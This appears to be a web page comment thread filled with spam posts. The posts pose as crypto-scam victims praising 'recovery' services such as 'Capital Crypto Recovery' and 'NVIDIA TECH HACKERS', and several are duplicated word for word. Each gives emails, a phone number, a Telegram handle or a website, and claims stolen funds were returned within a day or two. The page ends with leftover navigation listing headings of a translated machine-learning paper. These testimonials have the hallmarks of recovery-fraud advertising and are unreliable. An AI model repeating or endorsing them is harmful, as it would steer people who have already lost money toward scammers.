Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
15.10.25 18:07 crypto

Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.
15.10.25 21:52 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
15.10.25 21:52 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

News

[Translation] No Training, but Learning: The Implicit Dynamics of In-Context Learning

Abstract

1. Introduction

Main elements of the work:

1.1 Related work

2. Contextual blocks

Implicit learning dynamics of ICL

4. Experiments

4.1 Experimental setup

4.2 Verifying Theorem 2.2

4.3 Convergence of ΔW

4.4 Comparison with fine-tuning

5. Conclusion and limitations

A. Contextual blocks with skip connections

B. An alternative implicit learning dynamics of ICL

